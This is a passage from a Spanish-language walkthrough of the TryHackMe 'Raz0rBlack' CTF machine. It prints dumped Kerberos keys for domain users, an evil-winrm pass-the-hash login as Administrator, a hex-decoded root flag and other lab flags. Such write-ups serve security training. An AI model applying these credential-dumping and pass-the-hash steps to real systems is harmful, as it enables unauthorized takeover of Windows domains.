raz0rblack.thm\xyan1d3:aes256-cts-hmac-sha1-96:6de380d21ae165f55e7520ee3c4a81417bf6a25b17f72ce119083846d89a031f
raz0rblack.thm\xyan1d3:aes128-cts-hmac-sha1-96:9f5a0114b2c18ea63a32a1b8553d4f61
raz0rblack.thm\xyan1d3:des-cbc-md5:e9a1a46223cd8975
raz0rblack.thm\lvetrova:aes256-cts-hmac-sha1-96:3809e38e24ecb746dc0d98e2b95f39fc157de38a9081b3973db5be4c25d5ad39
raz0rblack.thm\lvetrova:aes128-cts-hmac-sha1-96:3676941361afe1800b8ab5d5a15bd839
raz0rblack.thm\lvetrova:des-cbc-md5:385d6e1f1cc17fb6
raz0rblack.thm\sbradley:aes256-cts-hmac-sha1-96:f790d6a749689497468b1eae5fa26bfa842446088115a4edc59730ee2d76436b
raz0rblack.thm\sbradley:aes128-cts-hmac-sha1-96:ffb39df24f1f980a096e14bca1a7fc33
raz0rblack.thm\sbradley:des-cbc-md5:409e45adf8dfe5a1
raz0rblack.thm\twilliams:aes256-cts-hmac-sha1-96:05bac51a4b8888a484e0fa1400d8f507b195c4367198024c6806d8eb401cb559
raz0rblack.thm\twilliams:aes128-cts-hmac-sha1-96:a37656829f443e3fe2630aa69af5cb5a
raz0rblack.thm\twilliams:des-cbc-md5:01e958b0ea6edf07
[*] Cleaning up...
Ahora simplemente nos conectamos con evil-winrm como Administrator haciendo un passthehash para poder obtener una powershell en la máquina
❯ evil-winrm -i raz0rblack.thm -u Administrator -H 9689931bed40ca5a2ce1218210177f0c
PS C:\Users\Administrator\Documents> whoami
raz0rblack\administrator
PS C:\Users\Administrator\Documents>
En su home podemos ver un xml sin embargo esta vez no es una credencial
PS C:\Users\Administrator> dir
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/21/2021 9:45 AM 3D Objects
d-r--- 5/21/2021 9:45 AM Contacts
d-r--- 5/21/2021 9:45 AM Desktop
d-r--- 5/21/2021 9:45 AM Documents
d-r--- 5/21/2021 9:45 AM Downloads
d-r--- 5/21/2021 9:45 AM Favorites
d-r--- 5/21/2021 9:45 AM Links
d-r--- 5/21/2021 9:45 AM Music
d-r--- 5/21/2021 9:45 AM Pictures
d-r--- 5/21/2021 9:45 AM Saved Games
d-r--- 5/21/2021 9:45 AM Searches
d-r--- 5/21/2021 9:45 AM Videos
-a---- 2/25/2021 1:08 PM 290 cookie.json
-a---- 2/25/2021 1:12 PM 2512 root.xml
PS C:\Users\Administrator> type root.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">Administrator</S>
<SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS>
</Obj>
</Objs>
PS C:\Users\Administrator>
La cadena es solo hexadecimal, lo decodeamos con xxd y podemos ver la flag
❯ echo 44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e6720796f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f75742077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b20617420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e636f6d2f726f6f6d2f6c696e75786167656e63792e0a | xxd -ps -r
Damn you are a genius.
But, I apologize for cheating you like this.
Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}
Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.
If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.
En el directorio home del usuario twilliams podemos ver un archivo exe con nombre bastante largo, podemos indicar que empieza con def y * para acortarlo
PS C:\Users\twilliams> dir
Directory: C:\Users\twilliams
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 10:18 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 10:20 AM 80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe
PS C:\Users\twilliams> type def*
THM{5144f2c4107b7cab04916724e3749fb0}
PS C:\Users\twilliams>
Tambien en el directorio Program Files tenemos dentro un directorio con el nombre Top Secret que dentro contiene solo un archivo de imagen con extensión png
PS C:\Program Files\Top Secret> dir
Directory: C:\Program Files\Top Secret
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/25/2021 10:13 AM 449195 top_secret.png
PS C:\Program Files\Top Secret> download top_secret.png
Info: Downloading C:\Program Files\Top Secret\top_secret.png to top_secret.png
Info: Download successful!
PS C:\Program Files\Top Secret>
La imágen es solo una referencia con humor a un problema comun en principiantes que es como salir de vim, la respuesta a esto y el secreto es simplemente :wq
